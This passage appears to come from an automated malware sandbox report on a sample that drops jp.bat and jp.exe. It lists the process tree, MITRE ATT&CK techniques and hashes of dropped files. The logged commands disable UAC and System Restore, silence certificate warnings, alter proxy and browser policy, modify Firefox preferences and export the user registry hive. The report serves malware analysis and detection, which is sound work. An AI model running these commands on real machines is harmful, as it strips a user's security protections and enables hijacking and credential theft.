      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:568
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2908
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2916
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2960
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2700
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2948
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2964
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2876
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3052
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:336
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 00000000 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      PID:1008
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c dir "\Users\Admin\.." /b /s | find "prefs.js"
      4⤵
      System Location Discovery: System Language Discovery
      PID:984
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" dir "\Users\Admin\.." /b /s "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2600
    - - C:\Windows\SysWOW64\find.exe
        
        find "prefs.js"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1904
  - - C:\Windows\SysWOW64\attrib.exe
      attrib.exe -r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\prefs.js "
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:1900
  - - C:\Windows\SysWOW64\attrib.exe
      attrib.exe -r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\prefs.js "
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:1260
  - - C:\Windows\SysWOW64\attrib.exe
      attrib.exe +r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\prefs.js "
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:340
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe export HKU C:\Users\Admin\AppData\Local\Temp\~r.tmp
      4⤵
      System Location Discovery: System Language Discovery
      PID:1348
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~r.tmp "
      4⤵
      System Location Discovery: System Language Discovery
      PID:2116
  - - C:\Windows\SysWOW64\find.exe
      C:\Windows\system32\find.exe "Internet Explorer\Main"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2268
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c type C:\Users\Admin\AppData\Local\Temp\~i.tmp | C:\Windows\system32\find.exe "S-1-5-21"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2056
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~i.tmp "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2516
    - - C:\Windows\SysWOW64\find.exe
        
        C:\Windows\system32\find.exe "S-1-5-21"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2108
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2408
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnonBadCertRecving" /t REG_DWORD /d "0x00000000" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1620
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2024
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnOnIntranet" /t REG_DWORD /d "0x00000000" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2372
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2124
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap" /v "AutoDetect" /t REG_DWORD /d "0x00000000" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1784
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1708
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 0x00000001 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1868
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c dir /b /s | find /i "java.policy"
      4⤵
      System Location Discovery: System Language Discovery
      PID:828
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" dir /b /s "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2104
    - - C:\Windows\SysWOW64\find.exe
        
        find /i "java.policy"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2112

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
017ccdb8e709267edc96fcffbac5d9ba

SHA1
d57fa804821cc5be0f3bb7ce98e88cb06d02566c

SHA256
6e55eeb3c267e9fcfb000c6d82c88d0a704b0920b86444e1e3b58a56ef0258a5

SHA512
05258881b620ccfeba2dba9589ced80ef0b801e06ab62e8d5be6803990c0ca9ec4c3dfce80a7bf29533df383c1042682742dcb3287f217891ae0378b762da30e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c80ec68797c7e5458e7126d036a6710c

SHA1
0757184c1733a7222a801363d7dd5c42301b63b6

SHA256
ef8a2a5ebe963283b87b4f86d679fcaf77b967277ff1c3d8adf8ad9e0d7b77f6

SHA512
35de3b88dd04a4b5770d9b1b074448a18e4aab50770a48ba66e9e15d71240b62f4a7673714082adfb50db9e6b555b1ffc336e651470aa1022025a713095e2545

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3dadff44ad84b6513b1f18d4e7ce69f0

SHA1
8eeb10e76b87cb27ad28e0417af2417420092d76

SHA256
a289b4bd56aa82162725b83955a8cf194246c5896b154fc3d39a2c2ea94b8df4

SHA512
f171e820fdb48d129320068ff8fe4f7be836ccf837541d0c4511eef25bbb0468f8e8522d512761189d7a0f91a3340489233e05bb2b5bc01fc07ae9dce531dbd1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
8f1f93eaa2c894366456bd1d019e92a0

SHA1
d87043b021e805f2173a53b212913da7db10da02

SHA256
69709acf0dd706a1c1951806bbf3195bbcb91eeafb648ad3526875b096a8c091

SHA512
a94948f356dcc9c20e4f2ac9e46168fc3a9ea7a402067bed0c4d822939c6896b6038ce39f6882635123fbc6f4e58b1408eafd890dfee8dbd8f22978b0ba7c292

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
172f12f0e053f59b014a7af9a356f983

SHA1
abd5d60ead5a60da7ab82fb1ba1a4eee45e8fcca

SHA256
56d4d576da3036073eb9e0567cc1736f070ac1253f9f139c1439b5443ec9ca06

SHA512
bf42e59734057deb13c03219d51086789d9325340f2812fa54295490587c6588e89fa783f5d7604bb069613b413ba1694356e523497661ec35b38b5893d7ea26

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
6063660129c143461acc9ff03fcb4dcd

SHA1
ea79c07379fdc5d88532a23735bd75186a3c729e

SHA256
b9c03dbcd649b298217c6729906de3d2362b865fcd03f26cfe1d509a8e41f6a1

SHA512
83b583c41d7bac953f6287e7fcc0fea8ef6877f2f27e90fe94410846046dfe2f77df3557d7058c79146174d66d1e8d423e3a6605f1cf7a0b1f6aa8fc0093489c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
cf286168d3dc4fbe3d5e3dbc51d0195e

SHA1
9d014e1b2fb9716cb844ea4a7e9ff4350f4f373c

SHA256
ede76500b6ff58bff37323dfbaeaf44aa62bb0fdcefa35fed78566f6bb281124

SHA512
c3c9a3926c8eeec2d3818d3b2fce36b4767c7db87e15ecc438d5a4e536a4eb5672602fec272ba2e1849b1514598a8ff1ff8d3b1d314dcc8066295f44e3c52cd2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ef69fbc5cdea391978d84468d2d98e2d

SHA1
376075349067b57e0b399cf99083ad2854c9f3e4

SHA256
6aab24e57aab07a98c98a37792070db87189e8a0d3e65fe25cad69ab3cbe0e3b

SHA512
597681e1149853848e402fe25d3f76d167a6e4a668526867fc10dbbbfa6638fb6762299b4f20efe496c66c89d83d092f7b356480191c1e79fa4c5ae248ef4ef2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c94d6f73d42479349157d177037516a7

SHA1
5644db4fa2ba5f31de54694b4e4220f19e3f6f3f

SHA256
a4d0a73340586300b0bd61874c0672bf599f74923c7cd8fd4e4af7624bf9420f

SHA512
a8566322c901be37e355283a4d46738a819d57ccf41071ba8ec3649695ffdd3e53fa821fbc103a981791346b61066fc826d03aee67d3a6eea636b07f0c941338

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e3f3b5bbde2ac6e87fbc489e6a601a92

SHA1
ceb1436fddb59b7c4334548e3f180bd542a364d8

SHA256
f4443887401e30a4732e7fb82bb1c9b3d2bf8cb7f523875322b955b2738423d2

SHA512
cb8f383bc17f3a26c988556b445cc4c14938f9451743900b802c3fd134cc1ce4f7e56df0483b6fda9d8abb1553f90f9e9d619ec54e963e41bcaacc770dbfadbd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4d89936bf27bda5c08e001112d722d65

SHA1
b47e59b8572d61291753af1327711758ece639fc

SHA256
0458004c31310c04c0df28d51205a40db0b6d5108c19cad25d7dd9371587f10b

SHA512
f24e5093419fb3d043f98105af4d766a4b3acf346e5fbda62891d5efe9796ec284deed5c7323a3b7758a7b8a1b1ca10d1c445ded35e2298b07e03dc8bfd35d49

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
7ebd8e7ad70064f6884682c90dea18a5

SHA1
e5b6dd25ab15a8ee339e477e73b753fef232ae8d

SHA256
e0698ab99075c85901858720a68093c8972cb36036edaf0730d59110cb61d784

SHA512
cac78acc903421f57b61f08176341eaba0a2ff0f4538864d0177ab1a0cd6039cbaf1a1247cac5fd1cc1080dac4ff17eef23e0049ad8dad55eb94f8ede5923f9c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c1f1c6d7a67f411ec1a50ba82b7e7610

SHA1
6f7af93e7e1b71f9b826e103c6a7b2c6966f12e9

SHA256
db637760b6297812f4b2b7d8431386e1d374e2a512f910ed603b5ae8851aadda

SHA512
59733d518344af9678f48770feb0fd6f89348c7282b90c8a88d6f3c2a31f16119aceaef92241f4e0343fec71d36f99cb41dca727ba27c190cf46fa50468bb7a5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
37a9fe787a722f4714d4b0555fed97b3

SHA1
e3105757a94e18f9977d69e9318900bec75db1f4

SHA256
33db537ed708b1af42e9735206ebf340be2e29ef2a627be67a04a2aa0d558a2e

SHA512
aa9fc1f19d6a72896ab8cc0927a86ae77bb2de1f7297a5e3d557637578203140ca2318824fcabb480f62d2eb5751e05be43ce6a9642e27d19a323461a997cc3d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a8ea9b7fbc67bfa661586db9e9d9f53a

SHA1
86f604eb327cee31a28a954b562cee9fb161c14f

SHA256
18e1d1ad83abfbd89e1bb1c33260009afcd74ed6e92c50fb8844609fd99130a8

SHA512
4167455561b8cbabdb69e8a784ece398510a1496283c611308dcbe084fc380124b7321e1f705e63ce1eb3aa6fd7f806b208d6bacaae9b86b614342193475bc8a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c13b76bb6882c73ac80cc10c9906f56c

SHA1
0c502e28ef597463f50b61dbf26b6d0a2b190178

SHA256
e5ff7728e821a0ae0d7f9be5330fc2396647b06e9e3c62d91dca80f351157128

SHA512
4c37625006cb0f19689d62aa238b823173c274e23bc0522987c6e714327a98258708fa0e4c2545c3973433c4604e53523c44f36a9039496259e2685aeb4e965f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
bddeb51d88636b7ca19c3e0807b384cf

SHA1
9caf0fa6acc87c84011f7d6287e9cd48d035afe4

SHA256
9b8ed0e397299c28f85442ff5470d2555cb0b2a256381f97d19d28088f6f1448

SHA512
f2ada4d6d41378746c2cb469fcb2a2098615bcfddfe631a52a2579a19c3d75b2e55f632bee8a0402b58dabef1e47b4d01b934cfa43d45fa981485ec2de1bc232

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ebbe5e6f2553df54931b0a42ad5228c5

SHA1
0342886a8da96b396c339e2a2834454811af9bcd

SHA256
4e72aa48a0d9d2f64329a64d5f3aa61178cbc5a7a1db5214d171df24be30b7c4

SHA512
ea648661194ba97b680769a92c50dc9349d70c1cb712fdf71e0826cf0911c586a8adb4a4030ba73cb0c7d46b7c0186f98ba102ce11322a478d1f92c89cef98e3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
bfe5680ee7281f224f5efcab1f226529

SHA1
9f685a49edb51e7a662d57c7b1b2a32e17bab701

SHA256
b807da064c49fa6c3e60f47a0aaa7894a8bf57c944570920da283aa98042b8d4

SHA512
2cf0ffed6868b8b8455cfd4f758cec69de3740dd644ba98b545f1bf60969d1cd04f4ee9491b7860d3cff129ff52fd32b4c572269329aa2bf907ae2826f9676db

Download Submit
C:\Users\Admin\AppData\Local\Temp\9B55.tmp\jp.bat

Filesize
7KB

MD5
01b59ab011db2ca3948a0946f3b663dd

SHA1
8b97d0c68c79c1ecf77808232a2c22bf1fbd435f

SHA256
e288630343877f6d87db620ffea9457a461f245e6d2ec4a3d57ca8da2855a9f8

SHA512
862b55f5d721f35196476ef9585981db2570fda942d8e7f6d22cb3875c5786257624a2e6c096e6f2f5b6a8154b198dfe0d72c3437924ea09c4f29fe2eab24c50

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab61B2.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar6233.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\jp.exe

Filesize
23KB

MD5
192ea991829450ece3ab1538cf2fb59c

SHA1
4f4d8fffd42a55048be8ee1490806dd5af4a1bd9

SHA256
ae18c7771c459b5b41e44167996bde66c51e4059477af579a4ae4e16e02ad3d5

SHA512
5ce59338d150732cb970c7e09c1f28e3581632a63560afcb994b73d6c17a40b31b244f631d7bd2b84f1c49ddb4142b4a9186a5c639198efac43e097292199230

Download Submit
C:\Users\Admin\AppData\Local\Temp\~i.tmp

Filesize
935B

MD5
8fba4c1675e4ebd89eff739090e265f1

SHA1
03145a5bfc4c3085a05aef308a3521f16f9714be

SHA256
6d06fe2874ffa5040a21994fabb50cd7ccebb61f103ba922b5a830e25d3f3527

SHA512
84ab4f4f24ce26770eb6518ed2a7a004f8cd80537983c455568a75886539ccbe8951dcbfc29a7300c1d06bf74652d49fe255794e441a9c7c3a1733ce1bcdf6e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\~r.tmp

Filesize
3.7MB

MD5
aca342da86241c7e0c1df75d9480b576

SHA1
fd8adb35700135ed16b1541e1544ba99d14d60cb

SHA256
5df6644b67b2a31791f40ddc632b9adc6e6edb0098e56c5db5bf75a3337b3c6c

SHA512
a5305a9ab3814975de8da0ed9c56e7fcbdfc8b641f308bf522b8672d332be8a979f085b30133a5fe1aa75fb8d1935158650b7cab90c72068b3bf331e7a01bbcd

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\prefs.js

Filesize
6KB

MD5
95448770cf2e821b1286cf10d046af49

SHA1
c22044ccffe1ac9adb20585d3e87483c96686dd8

SHA256
ab7f8ac8c340aebbae7f25c33cb0b3852e1ade16649e567c52c9ccc89bd79ba8

SHA512
626941e29d14ec705282fb00fce22a1431c0b621fd993aeb142a0b25e62d1d456972628c6c1bd09e0ac83ad4c5cf5d7f07a400ea8170bbad7d523c9927c7e577

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\prefs.js

Filesize
6KB

MD5
da31b3a6790ddba7e795b52755166db6

SHA1
50f53e6f020e4a8996e7e3001b258fff6e2264a9

SHA256
0fc77573e491e2cc6627f7f91555662d6405b85ab95e56b8affeca8f5261500b

SHA512
f607a8236123cb31568be9fbd527bee42838abd9b7a5752b35dcc12da1969771cebc0d9a44c3fd4b7fa86118cda707eb76b7e6e26cd35ea19074372a2e80aeae

Download Submit
memory/1864-10-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/1864-57-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/1864-62-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads